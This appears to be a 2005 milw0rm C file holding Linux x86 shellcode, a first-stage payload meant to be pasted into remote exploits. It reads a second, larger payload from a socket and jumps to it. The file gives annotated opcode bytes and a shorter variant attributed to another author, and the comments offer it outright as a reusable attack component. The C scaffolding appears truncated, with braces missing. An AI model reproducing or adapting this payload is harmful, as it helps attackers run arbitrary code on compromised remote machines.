/* h3ll-core.c by Charles Stevenson <core@bokeoa.com>
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it as a first stage payload when I desire to
* follow up with a real large payload of goodness. This actually
* is a bit larger than necessary because of the error checking but
* in some cases prooves nice. For a tiny version of the same theme
* check out mcb's 14 byte (saving of 15 bytes for all you
* mathematician's out there ;). The only problem might be that his
* reads from stdin and can only reads 385 bytes less than mine. So
* If you like to go big on the shellcode use mine... otherwise here's
* mcb's (or comment out the delimited lines below to shrink mine):
* "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
* I assume the file descriptor is in %esi. Since that's where it
* was on the last exploit I wrote. Change the instruction to
* the appropriate register from your fndsckcode or put an int in
* there for and fd that's always the same.
char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
// uncomment the following line to raise SIGTRAP in gdb
// "\xcc" // int3
// 22 bytes:
// if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
"\x31\xdb" // xor %ebx,%ebx
"\xf7\xe3" // mul %ebx
"\x42" // inc %edx
"\xc1\xe2\x09" // shl $0x9,%edx
"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi)
"\x04\x03" // add $0x3,%al
"\x54" // push %esp
"\x59" // pop %ecx
"\xcd\x80" // int $0x80
"\x3c\x02" // cmp $0x02,%al // (optional error check)
"\x7e\x02" // jle exit // (optional exit clean)
"\xff\xe1" // jmp *%ecx
// 7 bytes _exit(1) (optional _exit(1);)
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
int main(void)
void (*shell)() = (void *)&hellcode;
printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
return 0;
// milw0rm.com [2005-11-09]